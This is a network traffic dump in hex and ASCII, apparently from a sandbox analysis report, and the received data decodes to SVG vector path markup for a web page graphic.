                                                                                                                                                                                                                                                        Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1840INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1856INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                        Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1872INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1888INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                        Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1904INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1920INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                        Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1936INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1952INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                        Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1968INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                        Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1984INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2000INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2016INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2032INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                        Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2048INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                        Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2064INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2080INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                        Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2096INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
